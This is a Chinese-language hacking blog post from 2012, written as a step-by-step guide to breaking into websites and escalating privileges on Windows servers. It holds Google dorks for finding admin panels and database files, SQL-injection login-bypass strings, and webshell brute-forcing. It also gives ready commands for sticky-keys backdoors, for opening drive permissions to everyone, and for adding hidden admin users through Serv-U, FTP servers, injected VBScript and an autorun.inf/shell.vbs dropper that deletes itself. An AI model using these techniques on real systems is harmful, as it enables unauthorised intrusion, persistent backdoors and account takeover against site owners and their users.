入侵渗透的经验

2012-11-20 09:12 (分类:网络安全)

先看站点

拿shell的方法太多了  主要是提权和入侵思路 

踩点  PING命令ping系统      TTL=32     9X/ME 
                            TTL=64     LINUX 
                            TTL=128    2000X/XP 
                            TTL=255     UNIX 

1.对域名、ip、注册信息、同ip多网站的踩点   
          ip138     ip 
          ip866     注册信息  收录 
打开http://whois.chinaz.com/Default.aspx 

是什么类型的   asp 还是 php   还jsp   看能不能直接找到后台  

右击看下图片路径  猜站点后台根目录  有时候还可以看出是什么上传 

直接后台上传（像这种 http://www.xxx.com/uploadfile/  等等） 
还是编辑器上传（像这种 http://www.xxx.com/admin/uploadfile/  等等）
有时候直接暴露eweb 

试试注入        啊D配合google 批量搜索    site:xxx.com inurl:asp?id= 
试试找编辑器    google搜索                site:xxx.com inurl:ewebeditor 
                类似的还有    editor/ewebedit/FCKeditor/cuteeditor/syWebEditor/fck/eweb/ 

还可以通过搜索  
site:xxx.com inurl:/upload 
/upfile 
/Uploads 
/Upfiles 
/Uploadfile 
/filemanager 
/Uploadfile08 
/Uploadfile12 
/*+Uploads 
/Files 
还有试试 上传漏洞  有时候不需要  可以上传 自己抓包 改包 或者修改上传路径 欺骗上传 

自己猜一下后台 
http://www.***.com/admin 
还可以手动试试/login /manage /manager /admin_login /login_admin /system /master /boss 

利用google找后台： 
site:xxx.com inurl:admin 
类似的还有  inurl:login/admin/manage/manager/admin_login/login_admin/system/boss/master 
site:www.***.com intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system 
site:www.***.com intitle:管理|后台|登陆| 

                
通过google找重要文件   

site:xxx.com inurl:robots.txt   这个也可能找得到后台 
site:xxx.com inurl:robots.txt 

site:xxx.com filetype:mdb 
site:xxx.com filetype:ini 
site:xxx.com inurl:txt 
site:xxx.com  filetype:.bak 

site:xxx.com filetype:asmx 
             inurl:webservices|webservice|service|services 

site:xxx.com filetype:php 
site:xxx.com filetype:asp 
           

利用工具扫网站检测注入、xss、目录  还有可能扫到别人的shell 
试试扫注入    jsky/wvs/awvs             
试试扫目录    wwwscan/jsky/wvs/awvs     查看铭感目录 
试试扫XSS     wwwscan/jsky/wvs/awvs     通过xss掉网站账号  

如果扫到别人的shell   
先利用社会工程学 猜根据shell的名字 shell登陆信息  还不行 
用 爆破工具去爆破  webshell爆破软件 、不然溯雪也可以 
在找其他的方法入侵 

还是无法入侵 给大家一条建议；实在拿不下可以 利用google 采取迂回策略 
看手法 
google搜索： 
格式  自己的shell的信息 换下面的信息  如果shell   

名字叫做  keio.asp   
标题叫做：旁注-网站小助手  
中间的文字中有: 本文保存的绝对路径   
google搜索： 

inurl:/keio.asp 
intitle ：旁注-网站小助手 
intext :  本文保存的绝对路径 

用iis扫描一下  iis读写权限 
namp扫描      一下端口开放情况   
根据namp扫描的信息 
利用hscan扫描弱口令  或者流光也可以 
开了21可以试一下ftp爆破    
开了3389还可以试一下 3389简单爆破 

试试旁注  一般旁注都可以拿到一个shell权限  在利用一些 提权利器提权  
xiaoA.exe  pr.exe  巴西.exe MS  等等  
利用echo  或者 copy 一个shell到目标网站 

如果旁注拿到一个网站的shell但提权不上  而目标网站有 编辑器的话 
可以上传 一个test.asp  内容如下 
<%Session("eWebEditor_User") = "11111111"%> 
先访问下test.asp  在访问目标站点的ewebeditor后台的文件  说不定能进去 

不行用vbs获取iis配置信息也可以 
不然通过第三方软件提权 
lpk提权 
替换软件提权 
asp的shell记得配合啊D的扫可写可读目录  aspx的shell 配合欧欧的 扫可写可读目录 
cmd.exe  可以 改成cmd.com / cmd.db / cmd.txt 也可以运行 

还可以找 网站配置信息   sa 或者 mysql 的相关密码  有时候是私人服务器  还 
                        可以通过下数据库  破服务器各个网站的密码社工 
asp的  inc/conn.asp 
       conn.asp 
       config.asp 

aspx的 Web.Config 
       inc/conn.asp 
       conn.asp 
       config.asp 

还有一些  log   ini文件 txt文件  记得多看看 说不定记录有密码 

旁注不行 用C段 

收集信息从始至终  社工很重要   

有很多网站都是有源码下载的  或者一些oday、exp 
自己搭建环境 找后台路径  数据库路径  再去迂回入侵 

一些整理的资料 

找到后台  试试用Cookie欺骗进入网站管理后台 

试试万能密码 

asp的 
' or''=' 
' or 1=1-- 
' or 'a'='a-- 
'or'='or' 
" or 1=1-- 
or 1=1-- 
or 'a='a 
" or "a"="a 
') or ('a'='a 
") or ("a"="a 
) or (1=1 
'or''=' 

php万能密码 
（’ or 1=1 --  , ‘ or 1=1 # 和‘ or 1=1 /*） 
User: something  
Pass: OR 1=1 
jsp 万能密码 
1or1=1 
admin OR 1=1/* 
1'or'1'='1 
'or'='or' 

有时候可能直接绕过 

1. 
已知后台目录：http://www.xxx.com/admin 
直接跳转登陆页面：http://www.xxx.com./admin 
  （注意中间加的一点） 
直接进入登陆页面 
2. 
比如:http://allyesno.cnblogs.com/admin/login.aspx 
如果输入密码错误返回到http://allyesno.cnblogs.com/admin/error.aspx 
如果输入http://allyesno.cnblogs.com/admin%5Cindex.aspx  说不定可以饶过验证。 

3.md5破解不出 ：改密码试试  http://注入网址;update admin set password='新MD5密码' where password='旧MD5密码'-- [admin为表名.]

 

1

****************************************提权篇-************************** 

-----------------------------------第一.自身漏洞提权--------------------- 

0.先查看组建  端口   能执行cmd就看服务：net  start 

net 不行就用net1 不行就自己上传一个net到可写可读目录  

脚本也探测下支不支持aspx  jsp  php 

1.先利用 提权利器  提权    组建支持   直接cmd.exe 命令  拒绝访问  自己上传cmd.exe到可写可读目录 执行命令  

  还是拒绝 上传command.com   或者将cmd.exe 改名cmd.com 或者cmd.db或cmd.txt  上传 

2. 组建不支持    那就执行cmd2 还是不行  自己找可写可读目录 上传 cmd.exe  到可写可读目录 执行命令  

  还是拒绝 上传command.com   或者将cmd.exe 改名cmd.com 或者cmd.db或cmd.txt  上传 

cmd可以执行命令了上传提权利器 xiaoA.exe  pr.exe  巴西.exe MS  fuck.exe e 

上传 执行  有时候不能执行  把提权利器也改后缀上传   .com   .mdb   .txt 

3. 试试serv通杀7.8.9版本提权 

4. aspx  自带的 iis_spy 列举  跨过去 不能跨就  echo   或 copy 

5. 修改文件权限  cacls E:\index.asp /t /e /c /g interactive:f  

权限设置 

cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览 

cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览 

cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览 

cacls.exe f: /e /t /g everyone:F #把f盘设置为everyone可以浏览 

cacls d:\website /g everyone /e /t授与完全控制 

6. 通过一个lml.vbs列目录脚本 列出所有网站路径： 

lml.vbs脚本内容： 

On Error Resume Next 

If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then 

     Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs",4096,"Lilo" 

     WScript.Quit 

End If 

Set ObjService=GetObject("IIS://LocalHost/W3SVC") 

For Each obj3w In objservice 

     If IsNumeric(obj3w.Name) Then 

           Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name) 

           Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT") 

           If Err <> 0 Then WScript.Quit (1) 

           WScript.Echo Chr(10) & "[" & OService.ServerComment & "]" 

           For Each Binds In OService.ServerBindings 

                 Web = "{ " & Replace(Binds,":"," } { ") & " }" 

                 WScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","") 

           Next 

           WScript.Echo "Path         : " & VDirObj.Path 

     End If 

Next 

保存 

执行 /c cscript d:\freehost\xxx\web\lml.vbs 

不行的话  自己上传一个 cscript.exe到可读可写目录 在执行一次看行不行   

5.利用 

6. 安装5次shift后门，沾滞键后门，替换SHIFT后门： 

5次SHIFT，沾滞键后门： 

copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe 

copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y 

copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y 

替换SHIFT后门： 

attrib c:\windows\system32\sethc.exe -h -r -s 

attrib c:\windows\system32\dllcache\sethc.exe -h -r -s 

del c:\windows\system32\sethc.exe 

copy c:\windows\explorer.exe c:\windows\system32\sethc.exe 

copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 

attrib c:\windows\system32\sethc.exe +h +r +s 

attrib c:\windows\system32\dllcache\sethc.exe +h +r +s

 

2

 

---------------------------有控制权限的目录--------------------- 

有erveryone完全控制的目录   具有可写可读权限  自己可以上传啊D  和欧欧的 读可写可读目录的脚本 

1.c:\winnt\system32\inetsrv\data\  

是 erveryone完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行 

2.第3方软件的写日志目录‘log’普遍存在可写可执行权限 

3.C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ 

4.

------------------------------第3：第三方软件提权-------------------------- 

记住  用lpk.dll劫持添加用户利用文件提权 

将lpk.dll放到任意目录  

执行当前目录里的任意exe(最好是第三方程序)  

系统就会添加一个账号  

去开始程序拿下 下载快捷方式 到本地电脑查看第三方软件路径  

找到路径 看能跳转进去    

C:\  

D:\ 

C:\Program Files\  

D:\Program Files\  一般安装地方软件路径都在他们下面  不过也有 

1.paanywhere  

C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  一般 host目录  下他的 GIF  

文件，在本地安装 pcanywhere上去  

2.Serv-U， 如果有权限修改 ServUDaemon.ini，加个用户上去，密码为空  

[USER=WekweN|1]  

Password=  

HomeDir=c:\  

TimeOut=600  

Maintenance=System  

Access1=C:\|RWAMELCDP  

Access1=d:\|RWAMELCDP  

Access1=f:\|RWAMELCDP  

SKEYvalues=  

这个用户具有最高权限，然后我们就可以 ftp上去  

quote site exec net.exe user hk pass /add  

quote site exec net.exe localgroup administrators hk/add  

3. VNC提权   利用 

   shell 读取 vnc 保存在注册表中的密文，然后再使用工具VNC4X破解。 

VNC4 

    注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password 

    Radmin 默认端口是4899， 

     Regedit/e c:\123.txt HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\HKLM/SOFTWARE/Real      VNC/winVNC4/portnumber  端口位置 

VNC3 如下位置： 

    HKCU/software/orl/winVNC3/portnamber 

      HKCU/software/orl/winVNC3/password 

读出来的都是10禁止的  需转换16禁制 

VNC密码破解软件  VNCX.exe -w 2位 2位  的输入账号密码 cain 直接输入全部  然后VNC登陆工具登陆 

4.  FlashFXP 提权 

找到  FlashFXP下的  Sites. dat 这个文件(编辑)  看有没有密码  有密码 就下载下来有时候stats.bat sites。bat quick.bat 全下下来      替换 

flashfxp 文件夹的相应文件。打开 flashfxp 在站点中打开站点管理器  得到加密ftp密码 用xp星号密码查看器查看明文   

5.搜狗输入法 PinyinUp.exe 提权： 

    搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可，位于搜狗安装目录下，例如： 

    “C:\Program Files\SogouInput\5.0.0.3819\PinyinUp.exe” 

    搜狗拼音输入法，会定时调用这个文件进行升级，禁止还禁止不掉，呵呵，天然的后门。 

6.   QQ 迅雷 BT 等工具的同目录提权 

把此ws2help.dll文件放到QQ 迅雷 BT 等工具的同目录 会提权 

迅雷提权2 

安装目录下的geturl.htm getAllurl.htm 里面加入代码，其实也很渺茫。 

<script language="VBScript"> 

Set vbs=CreateObject("Wscript.Shell") 

vbs.run "cmd /c net user 用户名 密码 /add",0 

vbs.run "cmd /c net localgroup administrators 用户名 /add",0 

</script>   

进行提权 

7.G6FTP提权 

打开RemoteAdmin目录的Remote.ini文件，可查到管理员 

32位MD5加密的密文，破解admin  一般不能直接连 

需要端口转发  比如 Fpipe -l 28 -r 8021 

然后连接他的 28端口 

练上去 添加用户 设置E盘所有权限   

然后  site commands （就是添加命令 

command:     hacker 

description: hacker  

EXEcute：    添加一个1.bat的批处理） 

然后连接ftp 

执行 quote hacker 就会执行1.bat  

1.bat 的内容   

net user  keio  keio.asd /add & net localgroup administrators keio /add 

8.radmin提权 技巧 

默认密码  注册表位置 

HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters/parameter 

默认端口位置 

HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters/port 

Regedit /e C:/radmin.reg HKEY_LOCAL_MACHINE/SYSTEM/RAdmin/V2.0/server/parameters 

利用注册表到处 radmin信息  之后查看密码 登陆上去  hash可以不破解 一png radmin hash 版登陆输入hash 

radmin 3.0提权 

将winmm.dll 放到radmin3.x目录下  下次登陆会自动记录账号 

记录文件在  C:/windows/system32/ramin.log 

查看就可以 

9.leap ftp提权 

下载sites.ini 覆盖本地 的就能找到ftp账号密码 用密码星号查看器 

8.WinWebMail 提权加用户： 

    WinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式，接下来，看路径，访问“路径\web”传 shell，访问shell后，权限是system，直接放远控进启动项，等待下次重启。 

    没有删cmd组件的可以直接加用户，7i24的web目录也是可写，权限为administrator。 

9. 14147  FileZilla Server 提权    FileZilla+Server+Interface.xml这个文件存放了端口 密码等信息   

先转下端口 不然不能直接连  

本机 lcx.exe -listen 456 458 

服务器上 lcx.exe  我的外网ip 456 127.0.0.1 服务器ip 14147 

本地安装filezilla server   打开软件 连接到服务器  ip输入127.0.0.1 端口些458 

输入之前找 的 账号密码 进去之后  用户配置  添加用户  共享目录 设置权限 全勾上 

替换服务器提权 上传启动项提权 不能想serv-u一样执行目命令提权 

10.3389全拼输入法漏洞： 

   Ctrl+Shift”组合键，快速切换至全拼输入法 用鼠标右键点击状态条上的微软徽标，选取“帮助”（呈灰色说明打了补丁）中的“操作指南”，在“输入法操作指南”的左上角点击鼠标右键，在弹出的菜单中选择“跳至URL(J)…”输入C:\WinNT\System32 找到net.exe，并为net.exe创建一个快捷方式  确定 取“属性”，在“目标”中的c:\winnt\system32\net.exe user keio  keio123 /add & net.exe localgroup administrators
keio /add

##########NextPage[title=5]########## 

---------------------------------第4：其他方法提权：------------------------------ 

1. c:\DocumentsandSettings\AllUsers\「开始」菜单\程序\启  

动"写入 bat，vbs 等木马。  

2.下他的sam  一般下C盘  windows/repair下的sam  可能密码是以前的 

3. asp.dll提权 

把asp.dll加入特权的dll一族之中.提升步骤为: 

<1>先查看有特权一话有哪些.   

查看有特权的dll文件:     命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 

得到显示为: 之前省略 

“C:\\WINNT\\system32\\idq.dll” 

“C:\\WINNT\\system32\\inetsrv\\httpext.dll” 

“C:\\WINNT\\system32\\inetsrv\\httpodbc.dll” 

“C:\\WINNT\\system32\\inetsrv\\ssinc.dll” 

“C:\\WINNT\\system32\\msw3prt.dll” 

说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll 

<2>加asp.dll加入特权一族  

因为asp.dll是放在c:\\winnt\\system32\\inetsrv\\asp.dll (不同的机子放的位置不一定相同) 

加进去 

cscript adsutil.vbs set /W3SVC/InProcessIsapiApps  

"C:\\WINNT\\system32\\idq.dll" 

"C:\\WINNT\\system32\\inetsrv\\httpext.dll" 

"C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" 

"C:\\WINNT\\system32\\inetsrv\\ssinc.dll" 

"C:\\WINNT\\system32\\msw3prt.dll" 

"c:\\winnt\\system32\\inetsrv\\asp.dll" 

用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了 set是设置 get是查看 

提权完毕 

4.auto.ini 加 SHELL.VBS  

autorun.inf  

[autorun]  

open=shell.vbs  

shell.vbs  

dim wsh  

set wsh=createObject("WScript.Shell") 

wsh.run "net user guest /active:yes",0  

wsh.run "net user guest 520ls",0  

wsh.run "net localgroup administrators guest /add",0  

wsh.run "net user hkbme 520ls /add",0  

wsh.run "net localgroup administrators hkbme /add",0  

wsh.run "cmd.exe /c del autorun.inf",0  

wsh.run "cmd.exe /c del shell.vbs",0  

将这两将这两个文件放到对方硬盘的根目录下